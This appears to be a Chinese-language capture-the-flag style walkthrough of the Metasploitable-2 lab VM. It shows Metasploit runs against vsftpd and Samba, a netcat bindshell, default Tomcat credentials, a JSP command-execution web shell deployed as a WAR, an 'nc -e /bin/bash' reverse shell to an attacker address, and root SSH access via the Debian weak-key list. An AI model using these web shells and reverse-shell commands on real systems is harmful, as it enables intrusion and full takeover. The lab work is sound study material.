VulnHub Metasploitable-2

一、信息收集

nmap扫描

访问80端口

二、漏洞利用

1.漏洞一

1.vsftpd 2.3.4（CVE-2011-2523）

2.msf


msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.103.189
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

2.漏洞二

samba 3.x

可疑看到开放了samba服务，版本是：samba 3.x

可疑上网搜一下这个samba 3.x版本msf要用到的payload

msf所要用到的命令：


search samba 3.x
 
use exploit/multi/samba/usermap_script
 
show payloads
 
set payload cmd/unix/reverse
 
show options
 
set RHOSTS 靶机IP
 
run

直接进入shell，是root权限

4.漏洞三

DVWA靶场

默认账号密码：


账号：admin
密码：password

5.漏洞四

Backdoor 后门


┌──(root💀kali)-[~/桌面]
└─# nc 192.168.103.189 1524

6.漏洞五

apache tomcat

1.访问80端口

首先查看第一个网站就是80端口

查看下8180端口下面的tomcat

2.tomcat漏洞

利用tomcat文件上传漏洞，点击tomcat manager


账号：tomcat
密码：tomcat

存在一个文件上传的上传点

3.上传war包

jsp的可回显马，将他打包成war上传


<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("

");

}
%>


//jar -cvf 被打包的war包名字 jsp的可回显马
jar -cvf tomcats.war tomcat.jsp


然后我们访问下：
url:8180/war包名称/jsp木马完整名称
 
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=id

发现回显出来的权限不高

4.反弹shell


┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444
listening on [any] 4444 ...
 
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=nc -e /bin/bash 192.168.103.129 4444
url编码：
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123&cmd=nc%20-e%20%2Fbin%2Fbash%20192.168.103.129%204444
 
python -c 'import pty; pty.spawn ("/bin/bash")'  #交互式shell

查看内核版本 uname -a

5.ssh公钥文件


最后在/root/.ssh目录中发现了一个公钥文件
这个在低版本中也是可以利用


因为这里版本较低，然后是猜测存在openssl软件包伪随机数泄露，这里将那个包下载过来
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
(debian_ssh_rsa_2048_x86.tar.bz2)


.tar.bz2
解压：tar jxvf FileName.tar.bz2
压缩：tar jcvf FileName.tar.bz2 DirName
 
tar jxvf 5622.tar.bz2

然后来到/rsa/2048目录下面


grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable *.pub
//使用命令查找
 
57c3115d77c56390332dc5c49978627a-5429

6.root权限

然后我们直接通过私钥就可以登录了，然后我们直接就登录进root了


┌──(root💀kali)-[~/routing/rsa/2048]
└─# ssh root@192.168.103.187 -i 57c3115d77c56390332dc5c49978627a-5429